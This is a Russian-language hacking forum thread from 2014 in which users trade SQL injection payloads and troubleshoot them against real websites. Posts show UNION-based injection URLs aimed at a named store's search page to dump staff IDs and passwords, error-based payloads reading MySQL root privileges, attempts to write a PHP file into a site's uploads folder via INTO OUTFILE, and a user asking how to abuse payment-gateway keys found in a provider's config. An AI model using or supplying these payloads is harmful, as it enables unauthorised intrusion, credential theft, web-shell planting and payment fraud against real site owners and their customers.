28.07.2014, 14:04
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами:
8258006
Репутация:
25
|
|
Пустой ответ, например
Код HTML:
id=-371+Union(Select+1,staff_id,3,password,5,6,7,8,9,10+from+staff)+--+
в исходном коде обнаружил, что отображается полный запрос скрипта
|
|
|
28.07.2014, 14:09
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от Br@!ns
Столкнулся с проблемой
Код HTML:
...id=-371+Union(Select+1,user(),3,table_name,5,6,7,8,9,10+from+%60information_schema%60.tables)+--+
поля для вывода присутствуют, данные о таблицах и колонках выводятся. Но при попытке вывести данные с любых других таблиц (основной базы) эти поля остаются пустыми. При неверном построении запроса, вылазиет sql ошибка, так что запросы составляю верно. Какие есть пути вытягивания данных, кроме посимвольного перебора? Проблема либо в кодировке, либо в типах данных.
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]aes_decrypt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]aes_encrypt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]column_name[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])
[/COLOR][COLOR="#0000BB"]unhex[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]hex[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]column_name[/COLOR][COLOR="#007700"]))[/COLOR][/COLOR]
|
|
|
|
28.07.2014, 14:29
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами:
8258006
Репутация:
25
|
|
Ничего не помогает(
Вот примеры обоих запросов, уже самомоу интересно что там) глянете мб
Код HTML:
http://bplampsupply.com/search.php?category_id=-371+Union(Select+1,user(),3,column_name,5,6,7,8,9,10+from+%60information_schema%60.columns+where+TABLE_NAME='staff')+--+
http://www.bplampsupply.com/search.php?category_id=-371+Union(Select+1,staff_id,3,password,5,6,7,8,9,10+from+staff)+--+
|
|
|
|
28.07.2014, 14:49
|
|
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами:
7343606
Репутация:
652
|
|
Сообщение от Br@!ns
Ничего не помогает(
Вот примеры обоих запросов, уже самомоу интересно что там) глянете мб
Код HTML:
http://bplampsupply.com/search.php?category_id=-371+Union(Select+1,user(),3,column_name,5,6,7,8,9,10+from+%60information_schema%60.columns+where+TABLE_NAME='staff')+--+
http://www.bplampsupply.com/search.php?category_id=-371+Union(Select+1,staff_id,3,password,5,6,7,8,9,10+from+staff)+--+
У Вас таблица пустая.
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]371[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]Union[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]Select[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]user[/COLOR][COLOR="#007700"](),[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]table_rows[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]6[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]7[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]9[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]from[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]information_schema[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]tables[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]where[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]TABLE_NAME[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0x7374616666[/COLOR][COLOR="#007700"])+--+[/COLOR][/COLOR]
|
|
|
|
31.07.2014, 14:06
|
|
Новичок
Регистрация: 03.08.2009
Сообщений: 23
С нами:
8827377
Репутация:
-5
|
|
Добрый день!
Помогите с построением запроса
Сообщение от None
' and(select 1 from(select count(*),concat((select (select mid( concat(file_priv),1,100) from mysql.user where user='tt') ),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1
выводится нормально N у пользователя tt
Когда хочу вывести пользователя root
Сообщение от None
' and(select 1 from(select count(*),concat((select (select mid( concat(file_priv),1,100) from mysql.user where user='root') ),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1
выводится ошибка
Обнаружены слудующие ошибки: Subquery returns more than 1 row
Подскажите как правильно составить запрос для вывода нужной инфы.
------------
Так же пробовал сделать заливку файла через скуль - опять такие не нравится((
Сообщение от None
' and(select 1 from(select count(*),concat((select (select (select mid( concat(''),1,100) from mysql.user into outfile '/home/site.ru/uploads/s.php' limit 1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1
Обнаружены слудующие ошибки: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'limit 1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `' at line 1
Сообщение от None
' and(select 1 from(select count(*),concat((select (select mid( concat(''),1,100) from mysql.user into outfile '/home/site.ru/uploads/s.php') ),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1
так выводится
Обнаружены слудующие ошибки: Subquery returns more than 1 row |
|
|
|
31.07.2014, 15:17
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
Сообщение от Evil_Genius
Так же пробовал сделать заливку файла через скуль - опять такие не нравится((
Заливка выполняется без подзапросов. См. статьи по SQL-инъекциям.
Живой пример: https://forum.antichat.net/showthread.php?p=3741323#post3741323
Сообщение от Evil_Genius
Subquery returns more than 1 row
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]WHERE user[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'root'[/COLOR][COLOR="#0000BB"]LIMIT 1
[/COLOR][/COLOR]
В таблице mysql.user несколько записей, где user='root'. Обычно у них разные хосты (localhost, 127.0.0.1, ::1, site.com, ...).
|
|
|
|
01.08.2014, 14:59
|
|
Постоянный
Регистрация: 22.11.2010
Сообщений: 545
С нами:
8142806
Репутация:
324
|
|
Посоветуйте пожалуйста метод заливки через error based у mysql
|
|
|
|
01.08.2014, 16:26
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
Сообщение от psihoz26
Посоветуйте пожалуйста метод заливки через error based у mysql
Error-based - метод вывода информации. Для заливки вывод не нужен, используйте стандартные способы (см. ссылку выше).
Ещё есть что-то вроде такого:
https://rdot.org/forum/showpost.php?p=8510&postcount=2
Но не указаны версии, на новых данный способ неработоспособен.
|
|
|
|
02.08.2014, 14:24
|
|
Участник форума
Регистрация: 20.05.2008
Сообщений: 144
С нами:
9461186
Репутация:
171
|
|
У одного провайдера нашёл в конфигах следующую инфу:
Сообщение от None
CHRONOPAY_SETTINGS
{'cb_type': 'G',
'cb_url': 'https://pay.***.ru/onyma_payment_gate/chronopay_gate',
'currency': '',
'group_settings': {'5100150000***': {'cb_url': 'https://pay.***.ru/onyma_payment_gate/chronopay_gate_psi',
'product_id': '******-****-****',
'skey': '**********'},
'5100150000000000179012': {'cb_url': 'https://pay.***.ru/onyma_payment_gate/chronopay_gate_psi',
'product_id': '******-****-****',
'skey': '**********'}},
'product_id': '******-****-****',
'skey': '**************',
'submit_url': 'https://payments.chronopay.com'}
Как я понял - это кеи к платёжному шлюзу и собственно его линк.
Вопрос - что можно интересного сделать с этим ? |
|
|
|
02.08.2014, 15:50
|
|
Постоянный
Регистрация: 22.11.2010
Сообщений: 545
С нами:
8142806
Репутация:
324
|
|
CHRONOPAY_SETTINGS
https://payments.chronopay.com'
чо не замазал?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
